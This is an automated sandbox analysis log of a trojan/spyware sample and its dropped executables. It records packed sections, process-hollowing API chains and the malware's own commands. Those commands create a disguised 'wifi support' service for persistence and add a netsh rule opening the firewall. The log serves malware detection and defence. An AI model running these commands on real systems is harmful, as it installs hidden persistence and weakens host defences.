                      Source: 6B9B.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6B9B.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6B9B.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6B9B.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6BA5.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6BA5.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6BA5.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6BA5.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 77CC.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 77CC.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 77CC.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 77CC.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ttfssdi.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ttfssdi.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ttfssdi.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ttfssdi.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: evjgtzc.exe.30.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: evjgtzc.exe.30.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: evjgtzc.exe.30.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: evjgtzc.exe.30.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeSection loaded: mscorjit.dll
                      Source: GNXG5XLBEH.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\6E36.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: String function: 004048D0 appears 460 times
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: String function: 00422FD0 appears 133 times
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: String function: 0041E750 appears 172 times
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: String function: 0041E370 appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: String function: 02172794 appears 35 times
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: String function: 0040EE2A appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: String function: 00402544 appears 53 times
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: String function: 0041E5B0 appears 172 times
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: String function: 00422E30 appears 133 times
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_2_00402491 NtOpenKey,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00640110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: 2205.exe.4.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: D9EC.exe.4.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 5BBC.exe.4.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 1523.exe.4.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 54D0.exe.4.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 6471.exe.4.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 1523.exe.4.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 1523.exe.4.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 1523.exe.4.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 1523.exe.4.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: 2D8F.exe.4.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                      Source: 54D0.exe.4.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 54D0.exe.4.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 54D0.exe.4.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 54D0.exe.4.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: 6471.exe.4.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 6471.exe.4.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 6471.exe.4.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 6471.exe.4.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: GNXG5XLBEH.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ttfssdiJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@58/62@102/15
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: GNXG5XLBEH.exeVirustotal: Detection: 35%
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\GNXG5XLBEH.exe "C:\Users\user\Desktop\GNXG5XLBEH.exe"
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeProcess created: C:\Users\user\Desktop\GNXG5XLBEH.exe "C:\Users\user\Desktop\GNXG5XLBEH.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ttfssdi C:\Users\user\AppData\Roaming\ttfssdi
                      Source: C:\Users\user\AppData\Roaming\ttfssdiProcess created: C:\Users\user\AppData\Roaming\ttfssdi C:\Users\user\AppData\Roaming\ttfssdi
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5BBC.exe C:\Users\user\AppData\Local\Temp\5BBC.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6B9B.exe C:\Users\user\AppData\Local\Temp\6B9B.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6604 -ip 6604
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeProcess created: C:\Users\user\AppData\Local\Temp\6B9B.exe C:\Users\user\AppData\Local\Temp\6B9B.exe
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 520
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6BA5.exe C:\Users\user\AppData\Local\Temp\6BA5.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\77CC.exe C:\Users\user\AppData\Local\Temp\77CC.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8058.exe C:\Users\user\AppData\Local\Temp\8058.exe
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ceaplexz\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ceaplexz "wifi internet conection
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ceaplexz
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: unknownProcess created: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d"C:\Users\user\AppData\Local\Temp\77CC.exe"
                      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess created: C:\Users\user\AppData\Local\Temp\8058.exe C:\Users\user\AppData\Local\Temp\8058.exe
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeProcess created: C:\Users\user\Desktop\GNXG5XLBEH.exe "C:\Users\user\Desktop\GNXG5XLBEH.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5BBC.exe C:\Users\user\AppData\Local\Temp\5BBC.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6B9B.exe C:\Users\user\AppData\Local\Temp\6B9B.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6BA5.exe C:\Users\user\AppData\Local\Temp\6BA5.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\77CC.exe C:\Users\user\AppData\Local\Temp\77CC.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8058.exe C:\Users\user\AppData\Local\Temp\8058.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\ttfssdiProcess created: C:\Users\user\AppData\Roaming\ttfssdi C:\Users\user\AppData\Roaming\ttfssdi
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6604 -ip 6604
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 520
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeProcess created: C:\Users\user\AppData\Local\Temp\6B9B.exe C:\Users\user\AppData\Local\Temp\6B9B.exe
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ceaplexz\
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ceaplexz "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ceaplexz
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess created: C:\Users\user\AppData\Local\Temp\8058.exe C:\Users\user\AppData\Local\Temp\8058.exe
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6db7cd52-e3b7-4ecc-bb1f-388aeef6bb50}\InProcServer32
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5BBC.tmpJump to behavior
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_00419EC0 SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6204:64:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6604
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: 0.0
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: hijaduvinijebup
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: mocisacatenu
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: wapejan
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: wovag
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: cbH
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: Piruvora
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: gukafipa
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: mawecamaxe
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: Hiwejanoji
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: Pusazide
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: hukujid
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: 0.0
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: hijaduvinijebup
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: mocisacatenu
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: wapejan
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: wovag
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: cbH
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: Piruvora
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: gukafipa
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: mawecamaxe
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: Hiwejanoji
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: Pusazide
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: hukujid
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCommand line argument: cbH
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCommand line argument: cbH
                      Source: 6E36.exe.4.dr, Univesity_Grade_Calculator/Form1.csCryptographic APIs: 'CreateDecryptor'
                      Source: 8058.exe.4.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 8058.exe.4.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
